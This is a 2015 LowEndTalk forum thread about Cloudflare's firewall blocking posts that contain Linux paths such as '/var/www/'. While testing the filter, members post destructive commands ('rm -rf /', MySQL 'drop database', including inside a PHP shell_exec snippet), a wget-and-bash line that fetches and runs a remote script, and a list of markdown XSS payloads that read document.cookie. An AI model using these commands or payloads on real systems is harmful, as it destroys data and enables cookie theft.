Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Subscribe to our newsletter

Advertise on LowEndTalk.com

Latest LowEndBox Offers

    Amusing "Censorship" by LET? xD
    New on LowEndTalk? Please read our 'Community Rules' by clicking on it in the right menu!

    Amusing "Censorship" by LET? xD

    Well, sort of censorship. Although it seems to be enforced by Cloudflare.
    I'm not sure if I'm the only one having this problem, but I can't post...

    Literally. Not in replies or topics. I get this when trying to embed it in my topic:

    Or this when trying to embed it in my post:

    Comments

    • It's cloudflares WAF (Web Application Firewall).

      I'm assuming it's on strict

      Life is better when you're smiling

    • I can post /var/www/ without any problems...

      vrtz.net Cheap VPS Servers Offers - now with EXCLUSIVE offers! (all links are aff links)
      $12/year HostUS Deal (768MB RAM+768MB vSwap)$11.29/year GestionDBI Deal (768MB RAM)

    • rm_rm_ Member

      Yep same here, typing that string and clicking "Preview" gets me the same blocking windows.

    • AnthonySmithAnthonySmith Top Provider

      there are loads of things that do the same, its very sensitive about forward slashes, e.g. /proc/cpuinfo and hit preview.

      Thanked by 1Maximum_VPS

      Had enough of the scams on lowendbox, lowendtalk is now being infiltrated by corruption so I have chosen to make an low end exit #lexit for now - you can find me HERE

    • ClouviderClouvider Member, Provider

      @Mitchfizz05 browser addons ? Virus? Shared IP?

      Clouvider Leading UK Cloud Hosting solution provider || UK Dedicated Servers Sale || Tasty KVM Slices || Latest LET Offer

      Web hosting in Cloud | SSD & SAS True Cloud VPS on OnApp | Private Cloud | Dedicated Servers | Colocation | Managed Services

    • rm_rm_ Member

      AnthonySmith said: /proc/cpuinfo and hit preview.

      This one doesn't cause the problem for me.

    • Mitchfizz05Mitchfizz05 Member
      edited July 2015

      @Clouvider said:
      Mitchfizz05 browser addons ? Virus? Shared IP?

      A simple Australian iiNet residential IP. No VPNs or anything involved.
      Virus, I hope not - it doesn't appear to be a client side problem though.

    • Cloudflare give same error on different forums that use CloudFlare.

    • AnthonySmithAnthonySmith Top Provider

      odd.

      Had enough of the scams on lowendbox, lowendtalk is now being infiltrated by corruption so I have chosen to make an low end exit #lexit for now - you can find me HERE

    • adxnadxn Member, Provider

      Same here can't post / var / www /

      Sincerely,

      Shubhankar From Wuugly

    • ATHKATHK Member

      /var/ww

    • ATHKATHK Member

      Can't post www cloudflare error..

    • $ echo "Hello world" >> /var/www/index.html

      vrtz.net Cheap VPS Servers Offers - now with EXCLUSIVE offers! (all links are aff links)
      $12/year HostUS Deal (768MB RAM+768MB vSwap)$11.29/year GestionDBI Deal (768MB RAM)

    • It's a Cloudflare response not client side, although it depends what you put. It doesn't like Linux file directories (at least the default ones) such as the hosts file file path.

      Thanked by 1Maximum_VPS

      Jr System Administrator

    • Ole_JuulOle_Juul Member
      edited July 2015

      / var / www /
      For me it does not work in either preview or post.

      On a forum where there are particularly good reasons for posting something like that, I think it would be a good idea to fix it. /opinion

    • joepie91joepie91 Member, Provider

      @Ole_Juul said:
      / var / www /
      For me it does not work in either preview or post.

      On a forum where there are particularly good reasons for posting something like that, I think it would be a good idea to fix it. /opinion

      I wouldn't hold my breath. It's been a problem for months, and reported before.

      Thanked by 1Maximum_VPS
    • joepie91 said: I wouldn't hold my breath. It's been a problem for months, and reported before.

      Well if I'm not going to hold my breath, I might as well add a request for implementing proper html markup. The Register does that in their (very large international) forum, and the reason they decided to do that (they said) is that it is a tech forum, and users can be expected to be familiar with the web. Surely it is the same here.

    • ClouviderClouvider Member, Provider

      Have you contacted Cloudflare about it? Let them about the false positive.

      Clouvider Leading UK Cloud Hosting solution provider || UK Dedicated Servers Sale || Tasty KVM Slices || Latest LET Offer

      Web hosting in Cloud | SSD & SAS True Cloud VPS on OnApp | Private Cloud | Dedicated Servers | Colocation | Managed Services

    • @Clouvider said:
      Have you contacted Cloudflare about it? Let them about the false positive.

      Over Twitter, yes.

    • ClouviderClouvider Member, Provider

      I'm afraid that's not enough. Contact them directly, give them soem more details, like the website you are visiting and they Ray ID (which I believe is a unique number identifying the session). Give them something to work on.

      Clouvider Leading UK Cloud Hosting solution provider || UK Dedicated Servers Sale || Tasty KVM Slices || Latest LET Offer

      Web hosting in Cloud | SSD & SAS True Cloud VPS on OnApp | Private Cloud | Dedicated Servers | Colocation | Managed Services

    • CloudFlares solution to bad developers & software is blocking all common fuzz strings and characters that could be used maliciously.

      I guess the only solution is to get LET to turn down the filter, or just make sure that vanilla is actually sanitizing.

      Thanked by 1Francisco

      Security Consultant

    • fitvpnfitvpn Member

      I tried load LET from Tor and got blocked several times.They know Tor IPs and block access.

      Yes, I can boogie

    • fitvpn said: I tried load LET from Tor and got blocked several times.They know Tor IPs and block access.

      It sounds like there is some real bad code on LET if they need to compromise to that extent.

    • rmlhhdrmlhhd Member, Provider
      edited July 2015

      rm -rf /*

      mysql -u root -e 'drop database *'

      ^^ Cloudflare doesn't block either on mobile or PC.

      Thanked by 1Mitchfizz05
    • doghouchdoghouch Member
      edited July 2015

      @eastonch said:
      CloudFlares solution to bad developers & software is blocking all common fuzz strings and characters that could be used maliciously.

      I guess the only solution is to get LET to turn down the filter, or just make sure that vanilla is actually sanitizing.

      Pft - why would anyone use Vanilla if it didn't sanitize things?



      EDIT: Using the Chrome Compression Proxy also shows an error.

    • Got this for a few random things in the past, silly error...

    • FlamesRunnerFlamesRunner Member
      edited July 2015
      <?php
      shell_exec('mysql -uroot -plet -e "drop database *"');
      shell_exec('rm -rf /');
      echo 'lol';
      ?>
      

      Seems fine to me as well.

      wget https://s.flamz.pw/dl/bench.sh && bash bench.sh

      curl https://s.flamz.pw/analytics/bench/stats.php

    • Ole_JuulOle_Juul Member
      edited July 2015

      Ole_Juul said:

      It sounds like there is some real bad code on LET if they need to compromise to that extent.

      I just logged in with tor from another computer with a different IP. It asked me for a captcha and that was all. So, it actually looks like it works just fine - at least for me.

    • @Ole_Juul said:
      It sounds like there is some real bad code on LET if they need to compromise to that extent.

      All LET code is public and open source, with the exception of one simple module (the one that auto-sinks offers), so feel free to have a peek yourself :-)

      eastonch said: I guess the only solution is to get LET to turn down the filter, or just make sure that vanilla is actually sanitizing.

      Vanilla is sanitizing. I'm not sure why the WAF is set to a setting this strict, but I'll send an e-mail to CC to ask about it.

      Ole_Juul said: On a forum where there are particularly good reasons for posting something like that, I think it would be a good idea to fix it. /opinion

      Agreed.

      It's a CloudFlare thing, though, and while this particular setting may be annoying, I'm not aware of the benefits we may get from this WAF level and how that weighs up against the downside.

      I recommend Prometeus, the best provider ever!

    • mpkossen said: I'm not aware of the benefits we may get from this WAF level and how that weighs up against the downside.

      It might be a good precaution against 0-day exploits in Vanilla. We all remember the week where LET was hacked like 5 times, this doesn't really instill confidence in the security of Vanilla.

    • DillybobDillybob Member
      edited July 2015
      [a](javascript:prompt(document.cookie))
      [a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
      ![a](javascript:prompt(document.cookie))\
      <javascript:prompt(document.cookie)>  
      <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  
      ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
      [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
      [a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
      ![a'"`onerror=prompt(document.cookie)](x)\
      [citelol]: (javascript:prompt(document.cookie))
      [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
      [test](javascript://%0d%0aprompt(1))
      [test](javascript://%0d%0aprompt(1);com)
      

      test

      notmalicious
      a

      Yeah, looks like LET has patched the recent telescope vulnerability.

      If the future of the webhosting industry is dictated by a corporate title tag.. we have a HUGE issue. Help make it stop by boycotting WebHostingTalk

    • sepeisepei Member
      edited July 2015

      /var/ www

      Same here

    • emgemg Member

      Yeah, it happened to me a few weeks ago. I was trying to post some advice on how to use a sniph-pher tool to isolate and fix a problem. The post got blocked for posting hac-king advice.

      I was told that LET would unblock me, and I assume it happened, but by then, everyone had moved on, including me. I still have the useful advice somewhere in a text file on my local computer.

    • @gsrdgrdghd said:
      It might be a good precaution against 0-day exploits in Vanilla. We all remember the week where LET was hacked like 5 times, this doesn't really instill confidence in the security of Vanilla.

      As far as I am aware Vanilla has gotten a lot more stable and secure since then, especially since we are now running an unmodified version straight from their Github.

      I recommend Prometeus, the best provider ever!

    Sign In or Register to comment.